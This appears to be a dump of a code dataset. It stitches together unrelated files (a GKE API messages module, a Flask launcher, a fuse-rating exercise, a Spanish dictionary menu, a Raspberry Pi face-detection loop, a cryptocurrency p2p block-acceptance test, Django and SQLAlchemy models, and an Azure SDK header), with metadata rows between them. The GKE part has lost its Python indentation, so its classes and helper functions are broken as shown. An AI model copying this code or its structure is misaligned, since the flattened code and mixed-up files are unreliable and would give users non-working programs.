Kubernetes Engine or version aliases, which have the following behavior:
- "latest": picks the highest valid Kubernetes version - "1.X": picks
the highest valid patch+gke.N patch in the 1.X version - "1.X.Y": picks
the highest valid gke.N patch in the 1.X.Y version - "1.X.Y-gke.N":
picks an explicit Kubernetes version - "-": picks the Kubernetes master
version
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
updatedNodePool: The updated node pool object. This field must be empty if
any other node pool field is set (e.g. 'node_version', 'image_type',
'locations', etc.)
upgradeSettings: Upgrade settings control disruption and speed of the
upgrade.
workloadMetadataConfig: The desired workload metadata config for the node
pool.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
image = _messages.StringField(2)
imageProject = _messages.StringField(3)
imageType = _messages.StringField(4)
locations = _messages.StringField(5, repeated=True)
name = _messages.StringField(6)
nodePoolId = _messages.StringField(7)
nodeVersion = _messages.StringField(8)
projectId = _messages.StringField(9)
updatedNodePool = _messages.MessageField('NodePool', 10)
upgradeSettings = _messages.MessageField('UpgradeSettings', 11)
workloadMetadataConfig = _messages.MessageField('WorkloadMetadataConfig', 12)
zone = _messages.StringField(13)
class UpgradeSettings(_messages.Message):
r"""These upgrade settings control the level of parallelism and the level of
disruption caused by an upgrade. maxUnavailable controls the number of
nodes that can be simultaneously unavailable. maxSurge controls the number
of additional nodes that can be added to the node pool temporarily for the
time of the upgrade to increase the number of available nodes.
(maxUnavailable + maxSurge) determines the level of parallelism (how many
nodes are being upgraded at the same time). Note: upgrades inevitably
introduce some disruption since workloads need to be moved from old nodes to
new, upgraded ones. Even if maxUnavailable=0, this holds true. (Disruption
stays within the limits of PodDisruptionBudget, if it is configured.) For
example, a 5-node pool is created with maxSurge set to 2 and maxUnavailable
set to 1. During an upgrade, GKE creates 2 upgraded nodes, then brings down
up to 3 existing nodes after the upgraded nodes are ready. GKE will only
bring down 1 node at a time.
Fields:
maxSurge: The maximum number of nodes that can be created beyond the
current size of the node pool during the upgrade process.
maxUnavailable: The maximum number of nodes that can be simultaneously
unavailable during the upgrade process. A node is considered available
if its status is Ready.
"""
maxSurge = _messages.IntegerField(1, variant=_messages.Variant.INT32)
maxUnavailable = _messages.IntegerField(2, variant=_messages.Variant.INT32)
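# Illustrative sketch, not part of the generated API surface: the 5-node
# example from the docstring above expressed as a message, together with the
# parallelism bound it implies. The keyword constructor is assumed from the
# protorpc-style messages in this module.
def _example_upgrade_settings():
  """maxSurge=2, maxUnavailable=1 => at most 3 nodes upgraded in parallel."""
  settings = UpgradeSettings(maxSurge=2, maxUnavailable=1)
  max_parallel_upgrades = settings.maxSurge + settings.maxUnavailable  # == 3
  return settings, max_parallel_upgrades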
class UsableSubnetwork(_messages.Message):
r"""UsableSubnetwork resource returns the subnetwork name, its associated
network and the primary CIDR range.
Fields:
ipCidrRange: The range of internal addresses that are owned by this
subnetwork.
network: Network Name.
secondaryIpRanges: Secondary IP ranges.
statusMessage: A human readable status message representing the reasons
for cases where the caller cannot use the secondary ranges under the
subnet. For example if the secondary_ip_ranges is empty due to a
permission issue, an insufficient permission message will be given by
status_message.
subnetwork: Subnetwork Name.
"""
ipCidrRange = _messages.StringField(1)
network = _messages.StringField(2)
secondaryIpRanges = _messages.MessageField('UsableSubnetworkSecondaryRange', 3, repeated=True)
statusMessage = _messages.StringField(4)
subnetwork = _messages.StringField(5)
class UsableSubnetworkSecondaryRange(_messages.Message):
r"""Secondary IP range of a usable subnetwork.
Enums:
StatusValueValuesEnum: This field is to determine the status of the
secondary range programmatically.
Fields:
ipCidrRange: The range of IP addresses belonging to this subnetwork
secondary range.
rangeName: The name associated with this subnetwork secondary range, used
when adding an alias IP range to a VM instance.
status: This field is to determine the status of the secondary range
programmatically.
"""
class StatusValueValuesEnum(_messages.Enum):
r"""This field is to determine the status of the secondary range
programmatically.
Values:
UNKNOWN: UNKNOWN is the zero value of the Status enum. It's not a valid
status.
UNUSED: UNUSED denotes that this range is unclaimed by any cluster.
IN_USE_SERVICE: IN_USE_SERVICE denotes that this range is claimed by a
cluster for services. It cannot be used for other clusters.
IN_USE_SHAREABLE_POD: IN_USE_SHAREABLE_POD denotes this range was
created by the network admin and is currently claimed by a cluster for
pods. It can only be used by other clusters as a pod range.
IN_USE_MANAGED_POD: IN_USE_MANAGED_POD denotes this range was created by
Google Kubernetes Engine and is claimed for pods. It cannot be used
for other clusters.
"""
UNKNOWN = 0
UNUSED = 1
IN_USE_SERVICE = 2
IN_USE_SHAREABLE_POD = 3
IN_USE_MANAGED_POD = 4
ipCidrRange = _messages.StringField(1)
rangeName = _messages.StringField(2)
status = _messages.EnumField('StatusValueValuesEnum', 3)
class VerticalPodAutoscaling(_messages.Message):
r"""VerticalPodAutoscaling contains global, per-cluster information required
by Vertical Pod Autoscaler to automatically adjust the resources of pods
controlled by it.
Fields:
enabled: Enables vertical pod autoscaling.
"""
enabled = _messages.BooleanField(1)
class WorkloadIdentityConfig(_messages.Message):
r"""Configuration for the use of k8s Service Accounts in GCP IAM policies.
Fields:
identityNamespace: IAM Identity Namespace to attach all k8s Service
Accounts to.
workloadPool: The workload pool to attach all Kubernetes service accounts
to.
"""
identityNamespace = _messages.StringField(1)
workloadPool = _messages.StringField(2)
class WorkloadMetadataConfig(_messages.Message):
r"""WorkloadMetadataConfig defines the metadata configuration to expose to
workloads on the node pool.
Enums:
ModeValueValuesEnum: Mode is the configuration for how to expose metadata
to workloads running on the node pool.
NodeMetadataValueValuesEnum: NodeMetadata is the configuration for how to
expose metadata to the workloads running on the node.
Fields:
mode: Mode is the configuration for how to expose metadata to workloads
running on the node pool.
nodeMetadata: NodeMetadata is the configuration for how to expose metadata
to the workloads running on the node.
"""
class ModeValueValuesEnum(_messages.Enum):
r"""Mode is the configuration for how to expose metadata to workloads
running on the node pool.
Values:
MODE_UNSPECIFIED: Not set.
GCE_METADATA: Expose all GCE metadata to pods.
GKE_METADATA: Run the GKE Metadata Server on this node. The GKE Metadata
Server exposes a metadata API to workloads that is compatible with the
V1 Compute Metadata APIs exposed by the Compute Engine and App Engine
Metadata Servers. This feature can only be enabled if Workload
Identity is enabled at the cluster level.
"""
MODE_UNSPECIFIED = 0
GCE_METADATA = 1
GKE_METADATA = 2
class NodeMetadataValueValuesEnum(_messages.Enum):
r"""NodeMetadata is the configuration for how to expose metadata to the
workloads running on the node.
Values:
UNSPECIFIED: Not set.
SECURE: Prevent workloads not in hostNetwork from accessing certain VM
metadata, specifically kube-env, which contains Kubelet credentials,
and the instance identity token. Metadata concealment is a temporary
security solution available while the bootstrapping process for
cluster nodes is being redesigned with significant security
improvements. This feature is scheduled to be deprecated in the
future and later removed.
EXPOSE: Expose all VM metadata to pods.
GKE_METADATA_SERVER: Run the GKE Metadata Server on this node. The GKE
Metadata Server exposes a metadata API to workloads that is compatible
with the V1 Compute Metadata APIs exposed by the Compute Engine and
App Engine Metadata Servers. This feature can only be enabled if
Workload Identity is enabled at the cluster level.
"""
UNSPECIFIED = 0
SECURE = 1
EXPOSE = 2
GKE_METADATA_SERVER = 3
mode = _messages.EnumField('ModeValueValuesEnum', 1)
nodeMetadata = _messages.EnumField('NodeMetadataValueValuesEnum', 2)
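# Illustrative sketch, not part of the generated API surface: selecting the
# GKE metadata server mode described above. Per the docstring, this mode can
# only be enabled when Workload Identity is enabled at the cluster level.
# The keyword constructor is assumed from the messages in this module.
def _example_gke_metadata_server_config():
  """Expose metadata to workloads through the GKE Metadata Server."""
  return WorkloadMetadataConfig(
      mode=WorkloadMetadataConfig.ModeValueValuesEnum.GKE_METADATA)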
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
|
[
"[email protected]"
] | |
d8595f38931efaebad9121c07fafd55b564816a1
|
8be96a7791e50165b8849e69b1cf6a04869f2400
|
/run.py
|
58b06c7a845124aa433ff1a33ae2569c92e3b3e8
|
[] |
no_license
|
nosoccus/department-app
|
458b38387571d7dead37ff87b8dfda91cd0717fb
|
f822d1e05db5d869ab583a3a93e9e58d9100022a
|
refs/heads/main
| 2023-01-29T18:42:37.975524 | 2020-12-14T23:26:56 | 2020-12-14T23:26:56 | 317,921,415 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 76 |
py
|
import app
if __name__ == "__main__":
app.create_app().run(debug=True)
|
[
"[email protected]"
] | |
c93c5ccd6c588a6c7f2b024b62acc6badd12163b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/HDGiiCmSgJeeu3388_19.py
|
09b87a15f58f460743f3b6ef6eaacc88c698ba44
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 904 |
py
|
"""
A fuse melts when a current in an electrical device exceeds the fuse's rating,
breaking the circuit and preventing the heat from building up too much (which
can cause a fire). The ideal fuse to choose is **higher** than the device's
current output, yet **as close as possible** to it as well.
Given a list of _fuse ratings_, and the _device's current output_, return
which of the fuses is the best for the device.
### Examples
choose_fuse(["3V", "5V", "12V"], "4.5V") ➞ "5V"
choose_fuse(["5V", "14V", "2V"], "5.5V") ➞ "14V"
choose_fuse(["17V", "15V", "12V"], "9V") ➞ "12V"
### Notes
* You will be given three possible ratings in voltage.
* Fuses may not be in a sorted order.
* Assume that there is a valid fuse in every test case
"""
def choose_fuse(f, c):
    # Keep only the ratings that are at least as high as the device's
    # current output (strip the trailing "V" before comparing numerically).
    f = [int(e[:-1]) for e in f if float(e[:-1]) >= float(c[:-1])]
    # The best fuse is the smallest of the remaining ratings.
    return str(min(f)) + 'V'
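# Quick sanity checks that mirror the examples in the docstring above.
# Illustrative only; not part of the original exercise solution.
if __name__ == "__main__":
    assert choose_fuse(["3V", "5V", "12V"], "4.5V") == "5V"
    assert choose_fuse(["5V", "14V", "2V"], "5.5V") == "14V"
    assert choose_fuse(["17V", "15V", "12V"], "9V") == "12V"
    print("All docstring examples pass.")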
|
[
"[email protected]"
] | |
75398d6fb05ae07bc21020d5bd77276beee18c18
|
66a82eb045bd14d45163a76c61ad2bfe2f9d03ab
|
/EjBasicosPython/Ej9_Diccionario.py
|
5146a9bd79f6a9db005a42464bdefde5a83d80a1
|
[
"MIT"
] |
permissive
|
alexiscv/DAM2_SGE
|
c53da5fdeb0a7bcc69bf3f1f2aa929e03a62a04c
|
aa7371262e869becca51e5352a0e46c16a997f58
|
refs/heads/master
| 2021-01-24T12:23:26.714885 | 2018-02-28T00:12:10 | 2018-02-28T00:12:10 | 123,134,359 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,110 |
py
|
# Create an empty dictionary
d = {}

# Show the menu and return the selected option
def menu():
    print("## MENÚ ##")
    print("1) Añadir término")
    print("2) Buscar definición")
    print("0) Salir")
    print("Que desea hacer:")
    opcion = int(input())
    return opcion

# Show the menu for the first time
# and read the selected option
op = menu()

# Keep running until the user chooses to exit
while op != 0:
    # Execute the selected action
    # Add a term
    if op == 1:
        # Ask for the term's data
        print("Nombre del termino:")
        termino = input()
        print("Definición:")
        definicion = input()
        # Add it to the dictionary
        d[termino] = definicion
    # Look up a definition
    elif op == 2:
        # Ask for the term
        print("Nombre del termino:")
        termino = input()
        # Print its definition
        print(d[termino])
    else:
        print("ERROR: Opción no reconocida")
    # The action has been executed;
    # show the menu again
    op = menu()

# On exit, print the whole dictionary
print(d)
|
[
"[email protected]"
] | |
794d7b71c405e3df9b2868475614e966c73424c3
|
d6a752aefedf14439236017f2de98e5d40823f57
|
/bb2-07-05-face.py
|
b5cb5a5b17b2af28c03e731f69654c3e271a7e43
|
[] |
no_license
|
norihisayamada/opencv_bluebacks
|
918b243f178f4170f64a181e5d7dca262d6b85b4
|
df2cfadadc3f7a66eeb9784aa9427aa5cacd61b5
|
refs/heads/master
| 2022-11-12T02:10:09.345084 | 2020-07-10T03:02:36 | 2020-07-10T03:02:36 | 278,521,091 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,618 |
py
|
# -*- coding: utf-8 -*-
import picamera
import picamera.array
import cv2

cascade_path = "/usr/share/opencv/haarcascades/haarcascade_frontalface_alt.xml"
cascade = cv2.CascadeClassifier(cascade_path)

with picamera.PiCamera() as camera:
    with picamera.array.PiRGBArray(camera) as stream:
        camera.resolution = (320, 240)
        camera.framerate = 15
        while True:
            # Capture a frame into stream.array in BGR order
            camera.capture(stream, 'bgr', use_video_port=True)
            # Convert the frame to a grayscale image
            gray = cv2.cvtColor(stream.array, cv2.COLOR_BGR2GRAY)
            # Look for faces in the grayscale image
            facerect = cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=2, minSize=(30,30), maxSize=(150,150))
            if len(facerect) > 0:
                for rect in facerect:
                    # Draw a red rectangle around each detected face in the original image (stream.array)
                    # rect[0:2]: top-left corner of the rectangle, rect[2:4]: its width and height
                    # rect[0:2]+rect[2:4]: bottom-right corner of the rectangle
                    cv2.rectangle(stream.array, tuple(rect[0:2]), tuple(rect[0:2]+rect[2:4]), (0,0,255), thickness=2)
            # Show stream.array in a window
            cv2.imshow('frame', stream.array)
            # Press "q" to quit the application
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
            # Reset the stream for the next capture
            stream.seek(0)
            stream.truncate()

cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
d6b7f74c1a8958d8c0d2b441c408b1a559b1d5a0
|
1d21b7bc9205c9c2acd8b8fd8ee75dec93e974d4
|
/qa/rpc-tests/p2p-acceptblock.py
|
db03aff39949a8e3e99ec7b3f0a24f9f5da34678
|
[
"MIT"
] |
permissive
|
ZioFabry/LINC2
|
494d12be6034b7f5999960e3f3ed62f154be7ab8
|
a2e0e06cf68771a82bb1d4da30e0c914c8589bbe
|
refs/heads/master
| 2020-05-22T18:28:27.590171 | 2019-05-13T19:51:49 | 2019-05-13T19:51:49 | 186,471,965 | 0 | 0 |
MIT
| 2019-05-13T18:10:28 | 2019-05-13T18:10:27 | null |
UTF-8
|
Python
| false | false | 12,328 |
py
|
#!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
AcceptBlockTest -- test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that it is missing the height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
self.connection.send_message(msg_ping(nonce=self.ping_counter))
received_pong = False
sleep_time = 0.05
while not received_pong and timeout > 0:
time.sleep(sleep_time)
timeout -= sleep_time
with mininode_lock:
if self.last_pong.nonce == self.ping_counter:
received_pong = True
self.ping_counter += 1
return received_pong
class AcceptBlockTest(BitcoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("LINCD", "lincd"),
help="bitcoind binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Node0 will be used to test behavior of processing unrequested blocks
# from peers which are not whitelisted, while Node1 will be used for
# the whitelisted case.
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"],
binary=self.options.testbinary))
self.nodes.append(start_node(1, self.options.tmpdir,
["-debug", "-whitelist=127.0.0.1"],
binary=self.options.testbinary))
def run_test(self):
# Setup the p2p connections and start up the network thread.
test_node = TestNode() # connects to node0 (not whitelisted)
white_node = TestNode() # connects to node1 (whitelisted)
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], white_node))
test_node.add_connection(connections[0])
white_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
white_node.wait_for_verack()
# 1. Have both nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int ("0x" + n.getbestblockhash() + "L", 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted.
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in xrange(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
white_node.send_message(msg_block(blocks_h2[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 2)
print "First height 2 block accepted by both nodes"
# 3. Send another block that builds on the original tip.
blocks_h2f = [] # Blocks at height 2 that fork off the main chain
for i in xrange(2):
blocks_h2f.append(create_block(tips[i], create_coinbase(2), blocks_h2[i].nTime+1))
blocks_h2f[i].solve()
test_node.send_message(msg_block(blocks_h2f[0]))
white_node.send_message(msg_block(blocks_h2f[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h2f[0].hash:
assert_equal(x['status'], "headers-only")
for x in self.nodes[1].getchaintips():
if x['hash'] == blocks_h2f[1].hash:
assert_equal(x['status'], "valid-headers")
print "Second height 2 block accepted only from whitelisted peer"
# 4. Now send another block that builds on the forking chain.
blocks_h3 = []
for i in xrange(2):
blocks_h3.append(create_block(blocks_h2f[i].sha256, create_coinbase(3), blocks_h2f[i].nTime+1))
blocks_h3[i].solve()
test_node.send_message(msg_block(blocks_h3[0]))
white_node.send_message(msg_block(blocks_h3[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
# Since the earlier block was not processed by node0, the new block
# can't be fully validated.
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h3[0].hash:
assert_equal(x['status'], "headers-only")
# But this block should be accepted by node0 since it has more work.
try:
self.nodes[0].getblock(blocks_h3[0].hash)
print "Unrequested more-work block accepted from non-whitelisted peer"
except:
raise AssertionError("Unrequested more work block was not processed")
# Node1 should have accepted and reorged.
assert_equal(self.nodes[1].getblockcount(), 3)
print "Successfully reorged to length 3 chain from whitelisted peer"
# 4b. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node0. Node1 should process the tip if
# we give it the headers chain leading to the tip.
tips = blocks_h3
headers_message = msg_headers()
all_blocks = [] # node0's blocks
for j in xrange(2):
for i in xrange(288):
next_block = create_block(tips[j].sha256, create_coinbase(i + 4), tips[j].nTime+1)
next_block.solve()
if j==0:
test_node.send_message(msg_block(next_block))
all_blocks.append(next_block)
else:
headers_message.headers.append(CBlockHeader(next_block))
tips[j] = next_block
time.sleep(2)
        for x in all_blocks:
            try:
                self.nodes[0].getblock(x.hash)
                processed = True
            except:
                processed = False
            if x == all_blocks[287]:
                # The height-too-high block should not have been processed
                if processed:
                    raise AssertionError("Unrequested block too far-ahead should have been ignored")
                print "Unrequested block too far-ahead not processed"
            elif not processed:
                raise AssertionError("Unrequested block with more work should have been accepted")
headers_message.headers.pop() # Ensure the last block is unrequested
white_node.send_message(headers_message) # Send headers leading to tip
white_node.send_message(msg_block(tips[1])) # Now deliver the tip
try:
white_node.sync_with_ping()
self.nodes[1].getblock(tips[1].hash)
print "Unrequested block far ahead of tip accepted from whitelisted peer"
except:
raise AssertionError("Unrequested block from whitelisted peer not accepted")
        # 5. Test handling of an unrequested block on the node that didn't process it.
        # The block should still not be processed (even though it has a child that has
        # more work).
test_node.send_message(msg_block(blocks_h2f[0]))
# Here, if the sleep is too short, the test could falsely succeed (if the
# node hasn't processed the block by the time the sleep returns, and then
# the node processes it and incorrectly advances the tip).
# But this would be caught later on, when we verify that an inv triggers
# a getdata request for this block.
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
print "Unrequested block that would complete more-work chain was ignored"
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
test_node.last_getdata = None
test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_getdata
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
print "Inv at tip triggered getdata for unprocessed block"
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(blocks_h2f[0]))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
print "Successfully reorged to longer chain from non-whitelisted peer"
[ c.disconnect_node() for c in connections ]
if __name__ == '__main__':
AcceptBlockTest().main()
|
[
"[email protected]"
] | |
7b677664e2d8c491d59f10a622c3e9d6b0b04b4f
|
65e94640b9838d627c0781cab4317858baadc914
|
/item/migrations/0001_initial.py
|
66445d68eb8afc07d45352a4ba0ad90a0d637ee0
|
[] |
no_license
|
Acc-Zidan/airbnb4
|
ccfc2a3b098f5906ef2c0187ac7ef89e98552af9
|
1e74f3b9a9b9aa7fb2ae1c055128d549067a4abc
|
refs/heads/main
| 2023-03-01T21:01:19.318547 | 2021-02-09T18:34:42 | 2021-02-09T18:34:42 | 328,228,669 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,710 |
py
|
# Generated by Django 3.1.5 on 2021-01-22 19:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='Item/')),
('price', models.IntegerField(default=0)),
('description', models.TextField(max_length=10000)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_category', to='item.category')),
],
),
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image', models.ImageField(upload_to='place/')),
],
),
migrations.CreateModel(
name='ItemReview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rate', models.IntegerField(default=0)),
('feedback', models.CharField(max_length=2000)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('auther', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_auther', to=settings.AUTH_USER_MODEL)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_item', to='item.item')),
],
),
migrations.CreateModel(
name='ItemImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='ItemImages/')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_images', to='item.item')),
],
),
migrations.CreateModel(
name='Itembook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_from', models.DateField(default=django.utils.timezone.now)),
('date_to', models.DateField(default=django.utils.timezone.now)),
('qnty', models.IntegerField(default=1)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_item', to='item.item')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_owner', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='item',
name='place',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_place', to='item.place'),
),
]
|
[
"[email protected]"
] | |
80fa29ace4588b9060f696b19bc728f82cbc9939
|
149b139871110353d5ec5a34cd99b2d9b03233e0
|
/backend/br/jus/tredf/analysis/backend/model/models.py
|
674f5f5e1615ce32588de17c4b92c3b40dda580e
|
[] |
no_license
|
alisonsilva/python
|
ca9a99700086d724605d286f05045b40713c9b07
|
de7b31e2279c081750e8ad13b04816e122ff253b
|
refs/heads/master
| 2020-03-07T19:14:17.802736 | 2018-04-26T13:47:05 | 2018-04-26T13:47:05 | 127,665,603 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,816 |
py
|
from datetime import datetime
from br.jus.tredf.analysis.backend.conf import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
posts = db.relationship('Post', backref='author', lazy='dynamic')
def __repr__(self):
return '<User {}>'.format(self.username)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post {}>'.format(self.body)
class IpAddress(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.String(20))
log_entries = db.relationship('LogEntry', backref='ip_address', lazy='select')
occurrences = db.relationship('Occurrence', backref='ip_address', lazy='select')
class LogEntry(db.Model):
id = db.Column(db.Integer, primary_key=True)
instant = db.Column(db.DateTime, index=True, default=datetime.utcnow)
request = db.Column(db.String(100))
status = db.Column(db.Integer)
user_agent = db.Column(db.String(255))
ip_addressid = db.Column(db.Integer, db.ForeignKey('ip_address.id'), nullable=False)
class Occurrence(db.Model):
id = db.Column(db.Integer, primary_key=True)
threshold = db.Column(db.Integer)
duration = db.Column(db.String(20))
start_date = db.Column(db.DateTime, default=datetime.utcnow)
comments = db.Column(db.String(255))
qtd_found = db.Column(db.Integer)
ip_addressid = db.Column(db.Integer, db.ForeignKey("ip_address.id"), nullable=False)
|
[
"[email protected]"
] | |
7b4c48f9072d0d8d3c8bdefc2ff22386e5ca805f
|
c68f8159b2f396d0718f71a1e0eb3fa31058b62f
|
/analytics/urls.py
|
a434fda5659c24a2cdfc3e1b3d2fa7a23578504a
|
[] |
no_license
|
hamideshoun/url_shortener
|
ed5c20018db385cf384cc4fcca691db7d025cdd0
|
27fb116d20662c349edfaa89dbc59a798819ff68
|
refs/heads/master
| 2023-06-14T12:54:07.283495 | 2021-07-08T00:50:18 | 2021-07-08T00:50:18 | 383,959,929 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 138 |
py
|
from django.urls import path
from analytics.views import ReportAPIView
urlpatterns = [
path('reports/', ReportAPIView.as_view()),
]
|
[
"[email protected]"
] | |
ee2c1cb101ed600ef6a59804bd8a60d49f33250a
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2019_06_01/aio/_storage_management_client_async.py
|
c4106bd382d3bd7e0ec92066dc1895978266f306
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 |
MIT
| 2020-06-16T16:38:15 | 2019-08-30T21:08:55 |
Python
|
UTF-8
|
Python
| false | false | 8,245 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
